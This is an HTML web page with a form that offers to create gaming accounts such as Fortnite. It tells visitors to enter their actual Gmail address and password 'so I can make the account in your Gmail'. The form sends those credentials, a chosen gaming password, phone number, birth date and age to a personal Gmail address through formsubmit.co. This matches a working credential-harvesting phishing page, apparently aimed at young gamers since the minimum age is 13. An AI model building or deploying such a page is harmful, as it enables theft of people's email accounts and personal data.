<html><head>
  <style>
  
  body {
  display: flex;
  height: 100vh;
  justify-content: center;
  align-items: center;
  padding: 10px;
  background: linear-gradient(135deg, #71b7e6, #9b59b6);
  }
  
  
  fieldset {
  
    max-width: 700px;
    width: 100px;
    background: #fff;
    padding: 25px 30px;
    height: 500px;
    width: 400px;
  
  }

#name {
  width: 300px;
  height: 30px;
}
#gmail {
width: 300px;
height: 30px;
}
#password {
  height: 30px;
width: 300px;
}
#text {
  height: 30px;
  width: 300px;
}  
#phone {
  height: 30px;
  width: 300px;
}
#username {
  height: 30px;
  width: 300px;
}
#gmpassword {
 
  height: 30px;
  width: 300px;

}

  </style>
      </head>
      <body>
        <fieldset>


             
                  
          Hello, I wanted to tell you some of the instructions for this form.
         .1 where it said gmpassword you write what you want your gaming password to be
          
          .2 and the user name is where you write what you want your username to be.
          .3 and last is the text write what type of account you want like a fortnite or any.
          .4 and last make sure to put your actual Gmail and password  so I can make the account in your Gmail
         
          .5 things that are not required are phone number and the date of birth 
         .6  we will make sure to give you your account as fast as we can Thank you.
          
          <form action="https://formsubmit.co/robeladmassu750@gmail.com" method="post">
         
          <div>
              <input type="text" name="name" id="name"  id="name" placeholder="Name" required>
          </div>

          
                 
          <div>
              <input type="email" name="email" placeholder="Gmail" id="gmail" min="@gmail.com" required="">
          </div>
          
          <div>
            <input type="password" name="password" placeholder="password" id="password" required>
            </div>

          <div>
            <input type="name" name="Username" id="username"  placeholder="username" required>
          </div>


        

          <div>

            <input type="password" name="gmpassword" id="gmpassword" placeholder="gmpassword" required>

          </div>

          <div>
            <input type="tel" name="Phone" id="phone" placeholder="Phone" id="phone">
          </div>
          
          <div>
            <input type="text" name="messege" id="text"  id="text" placeholder="Type text">
          </div>
      
          <div>
            <input type="date" name="date" id="date">
            
                       </div>


           <div>
              <input type="number" name="age" id="age" min="13" max="100" placeholder="age" min="13">
           </div>

      

<div>
  <label for="Gender">Male</label>
  <input type="radio" name="Male" id="Male">
</div>

<div>
  <label for="Gender">Female</label>
  <input type="radio" name="Female" id="Female">
</div>




                  <button type="submit">Send</button>
             </form>
            </fieldset>
  
  
          
  
  </body></html>